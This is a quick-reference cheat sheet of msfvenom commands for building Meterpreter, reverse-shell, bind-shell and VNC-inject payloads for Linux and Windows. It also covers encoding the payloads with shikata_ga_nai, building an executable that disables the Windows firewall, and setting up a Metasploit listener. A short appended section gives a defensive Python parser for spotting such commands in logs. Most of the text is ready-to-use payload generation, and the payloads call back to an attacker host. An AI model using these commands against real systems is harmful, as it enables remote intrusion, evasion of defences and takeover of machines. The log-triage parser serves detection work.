MSF Venom Quick Guide
Updated: 2023
Meterpreter Shells
Metasploit Listener Quick Commands
use exploit/multi/handler
# Linux
set payload linux/x86/meterpreter/reverse_tcp
# Windows
set payload windows/meterpreter/reverse_tcp
Linux
Linux Meterpreter Reverse Shell - Staged x86
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > ms_x86.elf
Linux Meterpreter Reverse Shell - Staged x64
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > ms_x64.elf
Linux Meterpreter Reverse Shell - Inline x86
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > mi_x86.elf
Linux Meterpreter Reverse Shell - Inline x64
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > mi_x64.elf
Windows
Windows Meterpreter Reverse Shell - Staged x86
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > ms_x86.exe
Windows Meterpreter Reverse Shell - Staged x64
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > ms_x64.exe
Windows Meterpreter Reverse Shell - Inline x86
msfvenom -p windows/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > mi_x86.exe
Windows Meterpreter Reverse Shell - Inline x64
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > mi_x64.exe
More Payloads
Exec Perl Reverse Shell within PHP
msfvenom -p php/reverse_perl LHOST=YourIP LPORT=YourPort -f raw
Windows CMD Reverse Shell - Encoded with shikata_ga_nai with 4 iterations
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe -e x86/shikata_ga_nai -i 4 > shell-cmd.exe
Windows Execute a Command - eg: turn off firewall
msfvenom -f exe -p windows/exec CMD="netsh advfirewall set allprofiles state off" -o command.exe
Python Reverse Shell for Unix
msfvenom -p cmd/unix/reverse_python LHOST=YourIP LPORT=YourPort -f raw
Windows Powershell Reverse Shell
msfvenom -p windows/powershell_reverse_tcp LHOST=YourIP LPORT=YourPort -f raw
Windows Reverse Shell Shellcode to put into a C# App
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f csharp
Windows Bind Shell as a VBS script
msfvenom -p windows/shell/bind_tcp LHOST=YourIP LPORT=YourPort -f vbs -o shell.vbs
View Windows Desktop with VNC Viewer
msfvenom -p windows/vncinject/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > vnc.exe
Usage Tips
List Payloads and Payload options
msfvenom --list payloads
msfvenom -p [payload] --payload-options
msfvenom -p windows/meterpreter/reverse_tcp --payload-options
List Encoders
msfvenom --list encoders
Encoding your payload with x86/shikata_ga_nai is great, but sometimes your shellcode has bad chars and shikata_ga_nai may throw an error on generation. Listing the available encoders with the command above should help you find one that fits your parameters.
Formats
You can generate the shell output in two different formats: Executable or Transform. Which one you choose depends on the scenario.
Executable - Its own executable shell with an extension such as .elf, .exe, .py or .php. Eg: You have an unstable, non-interactive, low-priv shell and you want to get something more stable and efficient on a vulnerable Windows machine. You'd generate the payload as an .exe, create a listener, upload and execute.
Transform - Raw shellcode that can be pasted into an existing exploit. The transform format will depend on what that exploit is written in. Eg: You need to create shellcode to paste into your code execution exploit that's ultimately run by a vulnerable public-facing web app in JavaScript. To format your shellcode, you may want to use: --format js_le (JavaScript_LittleEndian)
List Formats
msfvenom --list formats
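A defender's view of the commands in this guide, as an added example that is not part of the original page: the sketch below parses msfvenom command lines recovered from shell history or process-creation logs and extracts the payload, callback address, output format and encoder for triage. The function names and sample lines are constructed for illustration, and the staged/inline label follows this guide's naming for Meterpreter payloads only (`meterpreter/` is staged, `meterpreter_` is inline).

```python
import shlex

# Constructed sample lines, as they might appear in a shell history file or a
# process-creation log on an audited host (addresses are RFC 5737 examples).
SAMPLE_LOG = [
    "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.0.2.10 LPORT=4444 -f elf > ms_x64.elf",
    "msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.0.2.10 LPORT=443 -f exe > mi_x64.exe",
    "msfvenom -p windows/shell/reverse_tcp LHOST=192.0.2.10 LPORT=53 -f exe -e x86/shikata_ga_nai -i 4 > shell-cmd.exe",
    "ls -la /tmp",
]

# msfvenom options that take a value, mapped to the triage field they fill.
FLAGS = {"-p": "payload", "--payload": "payload", "-f": "format", "--format": "format",
         "-e": "encoder", "--encoder": "encoder", "-i": "iterations",
         "--iterations": "iterations", "-o": "outfile", "--out": "outfile"}

def parse_msfvenom(line):
    """Return a dict of triage fields for one msfvenom command line, else None."""
    try:
        tokens = shlex.split(line)
    except ValueError:          # unbalanced quotes in a truncated log line
        return None
    if not tokens or tokens[0].rsplit("/", 1)[-1] != "msfvenom":
        return None
    rec = {}
    it = iter(tokens[1:])
    for tok in it:
        if tok in FLAGS:
            rec[FLAGS[tok]] = next(it, None)
        elif tok == ">":        # shell redirection names the output file
            rec["outfile"] = next(it, None)
        elif "=" in tok and not tok.startswith("-"):
            key, _, value = tok.partition("=")   # datastore options: LHOST, LPORT, CMD
            rec[key.upper()] = value
    payload = rec.get("payload") or ""
    if "meterpreter/" in payload:
        rec["delivery"] = "staged"   # expect a second-stage download from LHOST:LPORT
    elif "meterpreter_" in payload:
        rec["delivery"] = "inline"
    return rec

def triage(lines):
    """Keep only the lines that parsed as msfvenom invocations."""
    return [r for r in map(parse_msfvenom, lines) if r is not None]
```

The extracted LHOST and LPORT values are the pivots to check against firewall and proxy logs, and the output file name is the artifact to hunt for on disk.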